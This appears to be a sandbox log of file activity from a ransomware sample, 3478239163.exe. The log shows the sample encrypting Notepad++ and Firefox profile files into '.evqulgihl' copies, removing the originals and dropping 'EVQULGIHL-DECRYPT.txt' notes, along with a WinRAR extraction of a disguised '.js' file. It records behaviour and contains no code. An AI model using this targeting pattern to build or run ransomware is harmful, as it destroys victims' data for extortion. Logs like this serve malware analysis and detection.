2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\themes\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Notepad++\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.evqulgihl bs
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2 ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\journals\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1.evqulgihl ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1 ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.evqulgihl binary
2984 WinRAR.exe C:\Users\admin\AppData\Local\Temp\Rar$DIa2984.38950\Love_You_2019_27201936-txt.js text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\